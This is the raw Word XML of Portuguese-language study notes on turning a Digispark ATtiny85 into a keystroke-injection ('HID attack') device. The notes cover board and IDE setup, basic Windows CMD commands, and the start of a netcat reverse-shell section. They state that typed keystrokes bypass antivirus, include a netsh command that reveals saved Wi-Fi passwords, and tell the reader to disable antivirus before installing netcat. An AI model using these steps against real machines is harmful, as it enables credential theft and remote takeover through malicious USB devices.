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69AA2" w14:textId="3F3BD185" w:rsidR="00F63DBF" w:rsidRDefault="00F63DBF" w:rsidP="00F63DBF">
      <w:r>
        <w:t>Vai ser utilizado a placa Arduino Digispark Kickstarter Attiny85 (Placa que parece com um Pendrive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDBAFB1" w14:textId="77E73036" w:rsidR="00714D8E" w:rsidRDefault="00F63DBF" w:rsidP="00F63DBF">
      <w:r>
        <w:t>O Arduino é utilizado para projetos pessoais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4037E350" w14:textId="12283DB8" w:rsidR="00F63DBF" w:rsidRDefault="00104D64">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Quando você pluga no PC o antivirus não funciona nele, o digispark é um teclado mas sem as teclas (tem os drivers) emula a digitação de um teclado, e com isso pode ser feito ataques isso é chamado de “Human Interface Attack” ou HID, o antivirus normalmente vai procurar arquivos maliciosos (coisas rodando no PC) mas você digitando </w:t>
      </w:r>
      <w:r w:rsidR="00A60547">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>o antivirus não vai reconhecer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0432D5" w14:textId="22F4BDB2" w:rsidR="00F63DBF" w:rsidRDefault="00F63DBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7764B7AF" wp14:editId="6DE7B3BA">
            <wp:extent cx="4943475" cy="50482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67B" w14:textId="177E5DE1" w:rsidR="00975088" w:rsidRDefault="00975088">
      <w:r>
        <w:t>Site para baixar a IDE do Arduino</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E42FDE" w14:textId="0C1CA50A" w:rsidR="00975088" w:rsidRDefault="00335D60">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00975088" w:rsidRPr="00E528AF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.arduino.cc/en/software</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EBA589B" w14:textId="6ECC2094" w:rsidR="00975088" w:rsidRDefault="0044600D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3597A779" wp14:editId="2F33BC50">
            <wp:extent cx="5400040" cy="2801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D9A" w14:textId="5A430512" w:rsidR="0044600D" w:rsidRDefault="0044600D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21AD7EB2" wp14:editId="4097FC5A">
            <wp:extent cx="5400040" cy="40716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6A90" w14:textId="4F4AFA2E" w:rsidR="00D007B5" w:rsidRDefault="00D007B5"/>
    <w:p w14:paraId="0A6CA2D6" w14:textId="5F8211FC" w:rsidR="00D007B5" w:rsidRDefault="00D007B5">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D007B5">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Configuração da placa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF8E105" w14:textId="7A50A5F2" w:rsidR="00D007B5" w:rsidRDefault="00D007B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806BAA1" wp14:editId="07A3585C">
            <wp:extent cx="5400040" cy="29673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2190" w14:textId="465FE5AB" w:rsidR="007A4ACA" w:rsidRDefault="007A4ACA">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Coloca o link da URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FAA8B6" w14:textId="11D76F34" w:rsidR="007A4ACA" w:rsidRDefault="007A4ACA">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A4ACA">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://raw.githubusercontent.com/digistump/arduino-boards-index/master/package_digistump_index.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BD7411" w14:textId="10D1E8C0" w:rsidR="007A4ACA" w:rsidRDefault="007A4ACA">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2581875A" wp14:editId="7FCBBEB3">
            <wp:extent cx="5400040" cy="3323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7F8" w14:textId="59A10584" w:rsidR="007A4ACA" w:rsidRDefault="007A4ACA">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Depois você vai em ferramentas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115D7831" w14:textId="3AFF8AAA" w:rsidR="007A4ACA" w:rsidRDefault="007A4AC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F3369BD" wp14:editId="1F527FDA">
            <wp:extent cx="5400040" cy="2797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65A2" w14:textId="39B6CAA1" w:rsidR="007A4ACA" w:rsidRDefault="007A4ACA">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Placa &gt; Gerenciador de placa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348853F0" w14:textId="1326D752" w:rsidR="007A4ACA" w:rsidRDefault="007A4ACA">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="614641EE" wp14:editId="78131DA4">
            <wp:extent cx="5400040" cy="29673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0E13" w14:textId="547647A2" w:rsidR="0062017F" w:rsidRDefault="0062017F">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062017F">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://digistump.com/wiki/digispark/tutorials/connecting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1213B626" w14:textId="17BA26A0" w:rsidR="007A4ACA" w:rsidRDefault="007A4ACA">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Pra pesquisar digita “digispaek” e depois clica em instalar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B687DFF" w14:textId="2FBDA794" w:rsidR="007A4ACA" w:rsidRDefault="007A4AC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7AF2B11" wp14:editId="03097996">
            <wp:extent cx="5400040" cy="27616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B468" w14:textId="7A3232CD" w:rsidR="00AF4DB7" w:rsidRDefault="00AF4DB7">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Instalação dos drivers do digispark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3EA17" w14:textId="311188B5" w:rsidR="00AF4DB7" w:rsidRDefault="00AF4DB7">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF4DB7">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://raw.githubusercontent.com/digistump/arduino-boards-index/master/package_digistump_index.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618F057B" w14:textId="1A023CF1" w:rsidR="00AF4DB7" w:rsidRPr="00D007B5" w:rsidRDefault="00AF4DB7">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62E89B3A" wp14:editId="24B6218F">
            <wp:extent cx="5400040" cy="28822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7C16" w14:textId="2A30D7DC" w:rsidR="00D007B5" w:rsidRDefault="00047963">
      <w:r>
        <w:t>Detalhe: Se o seu teclado estiver em português tem que instalar mais uma biblioteca</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED5D2C3" w14:textId="089F9480" w:rsidR="00047963" w:rsidRDefault="00335D60">
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="008B6D88" w:rsidRPr="00E528AF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/Al0nnso/PendriveHacker-Scripts/main/DigiKeyboardPtBr.h</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DD36586" w14:textId="3BC00D55" w:rsidR="008B6D88" w:rsidRDefault="008B6D88"/>
    <w:p w14:paraId="51CC4407" w14:textId="50B82261" w:rsidR="008B6D88" w:rsidRDefault="008B6D88">
      <w:r>
        <w:t>Clica em Salvar como &gt; e salva na pasta onde você fez as configurações do teclado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430BC099" w14:textId="34E893DC" w:rsidR="00E12764" w:rsidRDefault="00E12764"/>
    <w:p w14:paraId="597D3670" w14:textId="339E4686" w:rsidR="00E12764" w:rsidRDefault="00E12764"/>
    <w:p w14:paraId="5A04425E" w14:textId="7072F91F" w:rsidR="00E12764" w:rsidRDefault="00E12764"/>
    <w:p w14:paraId="05CC0676" w14:textId="758AB262" w:rsidR="00E12764" w:rsidRDefault="00E12764">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B73A8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Principais comandos </w:t>
      </w:r>
      <w:r w:rsidR="00B73A8E" w:rsidRPr="00B73A8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>no CMD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EA6318" w14:textId="48875B96" w:rsidR="00B73A8E" w:rsidRDefault="00B73A8E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00B73A8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ir </w:t>
      </w:r>
      <w:r>
        <w:t>lista os diretórios (como se fosse explorar as pastas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD1606A" w14:textId="3AC31109" w:rsidR="00B73A8E" w:rsidRDefault="00B73A8E">
      <w:r w:rsidRPr="00B73A8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> entra em uma pasta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68714A3A" w14:textId="7ABC4AC0" w:rsidR="00B73A8E" w:rsidRDefault="00B73A8E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A09A788" wp14:editId="2F6CC487">
            <wp:extent cx="2543175" cy="8001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B48B" w14:textId="48DA6383" w:rsidR="00B73A8E" w:rsidRDefault="00B73A8E">
      <w:r>
        <w:t xml:space="preserve">E se eu digitar </w:t>
      </w:r>
      <w:r w:rsidRPr="00B73A8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>di</w:t>
      </w:r>
      <w:r>
        <w:t>r dentro na pasta ela vai listar as pastas pra mim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B77D03" w14:textId="7D287772" w:rsidR="00B73A8E" w:rsidRDefault="00B73A8E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B2F6DC7" wp14:editId="35931B19">
            <wp:extent cx="3505200" cy="2895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EF9" w14:textId="73BB7654" w:rsidR="00B73A8E" w:rsidRDefault="00113AA9">
      <w:r w:rsidRPr="00113AA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cd ..</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> volta a pasta anterior (pressionando a tecla Tab você vai listar os diretórios dentro da pasta)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B75911" w14:textId="42E6BB97" w:rsidR="00113AA9" w:rsidRDefault="00113AA9">
      <w:r w:rsidRPr="00113AA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mkdir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> você cria uma pasta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B7765C" w14:textId="09C75CE3" w:rsidR="002B18F0" w:rsidRDefault="002B18F0">
      <w:r w:rsidRPr="002B18F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> limpa </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A25B40" w14:textId="291F9A51" w:rsidR="00113AA9" w:rsidRDefault="00113AA9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FF3CFE3" wp14:editId="577B1D4B">
            <wp:extent cx="2847975" cy="619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79F" w14:textId="1FF14F55" w:rsidR="00113AA9" w:rsidRDefault="00113AA9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66222DBE" wp14:editId="4841D0BA">
            <wp:extent cx="1685925" cy="7905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89A" w14:textId="2FE9D14F" w:rsidR="00113AA9" w:rsidRDefault="00113AA9">
      <w:r w:rsidRPr="00113AA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> escreve testos no terminal</w:t>
      </w:r>
      <w:r w:rsidR="009D59FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F26CF47" w14:textId="380F8842" w:rsidR="009D59FF" w:rsidRDefault="009D59FF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B92B601" wp14:editId="165D0029">
            <wp:extent cx="2552700" cy="7905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2D88" w14:textId="17DB64D4" w:rsidR="009D59FF" w:rsidRDefault="009D59FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Também pode criar arquivos usando o comando </w:t>
      </w:r>
      <w:r w:rsidRPr="009D59FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B7D329" w14:textId="7DE07637" w:rsidR="009D59FF" w:rsidRDefault="009D59FF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64E76B0A" wp14:editId="1D02576B">
            <wp:extent cx="4457700" cy="742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DB9" w14:textId="0A4EE441" w:rsidR="009D59FF" w:rsidRDefault="009D59FF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67D7C1EF" wp14:editId="5B37E4BC">
            <wp:extent cx="4057650" cy="504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0EE" w14:textId="54BB4918" w:rsidR="009D59FF" w:rsidRDefault="009D59FF">
      <w:r w:rsidRPr="009D59FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> posso ler um arquivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF00DED" w14:textId="424F6DD8" w:rsidR="009D59FF" w:rsidRDefault="009D59FF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="288E0067" wp14:editId="6AB243DC">
            <wp:extent cx="3819525" cy="8001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491" w14:textId="2B50ADB5" w:rsidR="00D3135E" w:rsidRDefault="00D3135E">
      <w:r w:rsidRPr="00D3135E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> eu posso deletar os arquivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5124B2BF" w14:textId="7A1ECB7A" w:rsidR="00D3135E" w:rsidRDefault="00D3135E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78C4F2D8" wp14:editId="36A52F92">
            <wp:extent cx="3962400" cy="6191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068D" w14:textId="72B47B59" w:rsidR="00D3135E" w:rsidRDefault="00D3135E">
      <w:r w:rsidRPr="00D3135E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shutdown</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> desliga o computador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5783D38F" w14:textId="77777777" w:rsidR="00306957" w:rsidRPr="00306957" w:rsidRDefault="00306957" w:rsidP="003069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306957">
        <w:t>digite </w:t>
      </w:r>
      <w:r w:rsidRPr="00306957">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00306957">
        <w:t> , seguido da opção que você deseja executar. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7757F95A" w14:textId="77777777" w:rsidR="00306957" w:rsidRPr="00306957" w:rsidRDefault="00306957" w:rsidP="003069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b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00306957">
        <w:t>Para desligar o computador, digite </w:t>
      </w:r>
      <w:r w:rsidRPr="00306957">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shutdown /s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0505DAD3" w14:textId="77777777" w:rsidR="00306957" w:rsidRPr="00306957" w:rsidRDefault="00306957" w:rsidP="003069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306957">
        <w:t>Para reiniciar o computador, digite </w:t>
      </w:r>
      <w:r w:rsidRPr="00306957">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shutdown /r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA87E22" w14:textId="77777777" w:rsidR="00306957" w:rsidRPr="00306957" w:rsidRDefault="00306957" w:rsidP="003069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306957">
        <w:t>Para fazer logoff do seu computador, digite </w:t>
      </w:r>
      <w:r w:rsidRPr="00306957">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shutdown /l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FBC201" w14:textId="1E141959" w:rsidR="00306957" w:rsidRPr="00F4301D" w:rsidRDefault="00306957" w:rsidP="003069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306957">
        <w:t>Para obter uma lista completa de opções, digite </w:t>
      </w:r>
      <w:r w:rsidRPr="00306957">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shutdown /?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041D3D88" w14:textId="1DE93741" w:rsidR="00F4301D" w:rsidRDefault="00F4301D" w:rsidP="00F4301D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F4301D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netsh wlan show profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4301D">
        <w:t xml:space="preserve"> ver todas as redes que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> você conectou</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F98664" w14:textId="7C1A6F7A" w:rsidR="002C75F4" w:rsidRPr="000968D1" w:rsidRDefault="002C75F4" w:rsidP="00F4301D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000968D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">netsh wlan show profile </w:t>
      </w:r>
      <w:r w:rsidRPr="000968D1">
        <w:t>NOME_DA_REDE</w:t>
      </w:r>
      <w:r w:rsidRPr="000968D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> key=clear </w:t>
      </w:r>
      <w:r w:rsidRPr="000968D1">
        <w:t>ver a senha</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D739879" w14:textId="77777777" w:rsidR="002C75F4" w:rsidRPr="000968D1" w:rsidRDefault="002C75F4" w:rsidP="00F4301D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10ED05C3" w14:textId="77777777" w:rsidR="00306957" w:rsidRPr="000968D1" w:rsidRDefault="00306957"/>
    <w:p w14:paraId="1265AD68" w14:textId="77777777" w:rsidR="00113AA9" w:rsidRPr="000968D1" w:rsidRDefault="00113AA9"/>
    <w:p w14:paraId="3CFFC205" w14:textId="4135D90B" w:rsidR="00B73A8E" w:rsidRPr="000968D1" w:rsidRDefault="00B73A8E"/>
    <w:p w14:paraId="49D44F4A" w14:textId="70F2B0FB" w:rsidR="001160FB" w:rsidRPr="000968D1" w:rsidRDefault="001160FB"/>
    <w:p w14:paraId="297C8AFD" w14:textId="29ECE4DA" w:rsidR="001160FB" w:rsidRPr="000968D1" w:rsidRDefault="001160FB"/>
    <w:p w14:paraId="001449FA" w14:textId="2566B9F0" w:rsidR="001160FB" w:rsidRPr="000968D1" w:rsidRDefault="001160FB"/>
    <w:p w14:paraId="70F7F5EA" w14:textId="73A215A7" w:rsidR="001160FB" w:rsidRPr="000968D1" w:rsidRDefault="001160FB"/>
    <w:p w14:paraId="2C25AD6B" w14:textId="3C7A9E30" w:rsidR="001160FB" w:rsidRPr="000968D1" w:rsidRDefault="001160FB"/>
    <w:p w14:paraId="471379BE" w14:textId="513253DA" w:rsidR="001160FB" w:rsidRPr="000968D1" w:rsidRDefault="001160FB"/>
    <w:p w14:paraId="12C7A645" w14:textId="104250E7" w:rsidR="001160FB" w:rsidRPr="000968D1" w:rsidRDefault="001160FB"/>
    <w:p w14:paraId="5B266B5C" w14:textId="6BF18029" w:rsidR="001160FB" w:rsidRPr="000968D1" w:rsidRDefault="001160FB"/>
    <w:p w14:paraId="448F18F9" w14:textId="77731C53" w:rsidR="001160FB" w:rsidRDefault="000968D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000968D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:t>everseShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16128A3A" w14:textId="38DF3590" w:rsidR="000968D1" w:rsidRDefault="000968D1">
      <w:r>
        <w:t>Vai seu utilizado um programa chamado Net Cat, pode baixar qualquer versão</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACB19D9" w14:textId="6616A555" w:rsidR="000968D1" w:rsidRDefault="00335D60">
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="000968D1" w:rsidRPr="006110EF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://eternallybored.org/misc/netcat/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DD1ADC9" w14:textId="41D0F59B" w:rsidR="000968D1" w:rsidRDefault="000968D1">
      <w:r>
        <w:t>1 – Pra instalar desabilite o antivírus por enquanto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086B195A" w14:textId="11F8A6FE" w:rsidR="00E402F3" w:rsidRDefault="00E402F3">
      <w:r>
        <w:t>2 – Extrai o arquivo zipado e abre a pasta do arquivo e copia o caminho p/colar no CMD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B10DB" w14:textId="2E50938A" w:rsidR="00E402F3" w:rsidRDefault="00E402F3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46BEA683" wp14:editId="3690884D">
            <wp:extent cx="5400040" cy="24568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D6D8" w14:textId="514EF3FB" w:rsidR="00E402F3" w:rsidRDefault="00E402F3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1852B0D9" wp14:editId="5BB1DBED">
            <wp:extent cx="5400040" cy="28346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8B4" w14:textId="3BFE33F4" w:rsidR="00E402F3" w:rsidRDefault="00E402F3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3 – Digita “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E402F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc.exe</w:t>
      </w:r>
      <w:r>
        <w:t>” que é o nome do arquivo e da ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221BEB43" w14:textId="602AE0E0" w:rsidR="00E402F3" w:rsidRDefault="00E402F3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6801E98F" wp14:editId="2C69FA47">
            <wp:extent cx="4705350" cy="1885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D0EE" w14:textId="70C41191" w:rsidR="00E402F3" w:rsidRDefault="00E402F3">
      <w:r>
        <w:t xml:space="preserve">Se aparecer </w:t>
      </w:r>
      <w:r w:rsidRPr="00E402F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cmd line:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> é porque está funcionando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C5E06B" w14:textId="259C57EE" w:rsidR="00E402F3" w:rsidRDefault="00E402F3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DF38394" wp14:editId="720B7EE8">
            <wp:extent cx="4505325" cy="10953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10E9" w14:textId="08F36338" w:rsidR="00A75BCA" w:rsidRDefault="00A75BCA">
      <w:r>
        <w:t>4 – Nesse procedimento vamos fazer o teste com o IP da própria máquina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3217E2" w14:textId="5D1960D0" w:rsidR="00552747" w:rsidRDefault="005B0523">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
